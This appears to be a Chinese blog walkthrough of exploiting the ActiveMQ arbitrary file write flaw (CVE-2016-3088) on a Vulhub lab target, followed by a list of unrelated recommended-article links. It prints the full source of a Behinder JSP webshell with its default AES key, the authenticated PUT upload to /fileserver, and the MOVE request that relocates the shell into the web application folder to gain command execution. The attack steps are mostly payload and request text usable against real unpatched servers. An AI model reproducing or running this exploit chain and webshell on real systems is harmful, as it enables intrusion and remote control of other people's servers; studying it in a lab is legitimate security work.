Vulhub靶机 ActiveMQ任意 文件写入(CVE-2016-3088)(渗透测试详解)

一、开启vulhub环境

复制代码
docker-compose up -d  启动
docker ps 查看开放的端口

漏洞版本:ActiveMQ在5.14.0之前的版本(不包括5.14.0)

二、访问靶机IP 8161端口

默认账户密码都是admin

1、利用bp抓包,修改为PUT方法并在fileserver目录上传ry.txt冰蝎马,回显204证明上传成功**(注意要加Authorization:认证参数)**

复制代码
/fileserver/ry.txt  请求目录
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>  冰蝎码

2、访问/fileserver/ry.txt文件,看是否可以成功解析

解析成功

3、通过MOVE方法移动ry.txt冰蝎马到api页面的ry.jsp文件中

复制代码
MOVE /fileserver/ry.txt  移动方法
Destination: file:///opt/activemq/webapps/api/ry.jsp  写入路径

3、访问/api/ry.jsp,看是否解析

三、冰蝎连接,得到一个shell

注,需要在自定义请求头加上认证参数,如下:``Authorization: Basic YWRtaW46YWRtaW4=

至此,命令执行成功。

下期再见,家人们。

相关推荐
zhongerzixunshi21 小时前
把握申报机遇 赋能高质量发展
大数据·人工智能
AI数据皮皮侠1 天前
中国乡村旅游重点村镇数据
大数据·人工智能·python·深度学习·机器学习
小北方城市网1 天前
第 11 课:Python 全栈项目进阶与职业发展指南|从项目到职场的无缝衔接(课程终章・进阶篇)
大数据·开发语言·人工智能·python·数据库架构·geo
小白勇闯网安圈1 天前
[极客大挑战 2019]Http、[极客大挑战 2019]Upload、[ACTF2020 新生赛]Upload
网络安全
躺柒1 天前
读共生:4.0时代的人机关系06人机合作关系
大数据·人工智能·人机协作·人机对话·人机合作
天远数科1 天前
前端体验优化:用Node.js中间件无缝集成天远手机号码归属地核验服务
大数据·api
DeepVis Research1 天前
【Storage/Signal】2026年度非线性存储一致性与跨时域信号处理基准索引 (Benchmark Index)
算法·网络安全·数据集·分布式系统
Hello.Reader1 天前
Flink Table/SQL 自定义 Connector从 DDL 元数据到运行时 Source/Sink(含 Socket 全栈例子拆解)
大数据·sql·flink
vortex51 天前
AppArmor 受限 Shell 环境绕过技术分析:利用动态链接器路径差异实现 Profile 逃逸
linux·运维·服务器·网络安全
电商API_180079052471 天前
淘宝商品评论数据抓取指南|API调用演示
大数据·数据库·人工智能·数据分析·网络爬虫